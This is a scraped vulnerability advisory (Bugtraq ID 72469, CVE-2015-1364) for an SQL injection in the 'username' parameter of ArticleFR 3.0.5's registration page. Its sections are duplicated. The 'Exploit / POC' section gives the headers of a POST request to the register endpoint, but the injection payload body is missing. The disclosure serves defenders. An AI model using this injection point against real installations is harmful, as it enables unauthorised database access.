ArticleFR 'username' Parameter SQL Injection Vulnerability
BID:72469
Info
ArticleFR 'username' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 72469 |
| Class: | Input Validation Error |
| CVE: |
CVE-2015-1364 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 03 2015 12:00AM |
| Updated: | Feb 03 2015 12:00AM |
| Credit: | Tran Dinh Tien & ITAS Team |
| Vulnerable: |
Freereprintables Articlefr 3.0.5 |
| Not Vulnerable: | |
Discussion
ArticleFR 'username' Parameter SQL Injection Vulnerability
ArticleFR is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ArticleFR 3.0.5 is vulnerable; other versions may also be affected.
ArticleFR is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ArticleFR 3.0.5 is vulnerable; other versions may also be affected.
Exploit / POC
ArticleFR 'username' Parameter SQL Injection Vulnerability
An attacker can exploit the issue using a browser.
The following example request is available:
POST /articlefr/register/ HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101
Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.org/articlefr/register/
Cookie: _ga=GA1.2.884814947.1419214773;
__unam=bd22dea-14a6fcadd31-42cba495-31; GEAR=local-5422433b500446ead50002d4;
PHPSESSID=8a9r8t1d5g9veogj6er9fvev63; _gat=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
An attacker can exploit the issue using a browser.
The following example request is available:
POST /articlefr/register/ HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101
Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.org/articlefr/register/
Cookie: _ga=GA1.2.884814947.1419214773;
__unam=bd22dea-14a6fcadd31-42cba495-31; GEAR=local-5422433b500446ead50002d4;
PHPSESSID=8a9r8t1d5g9veogj6er9fvev63; _gat=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
Solution / Fix
ArticleFR 'username' Parameter SQL Injection Vulnerability
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
ArticleFR 'username' Parameter SQL Injection Vulnerability
References:
References: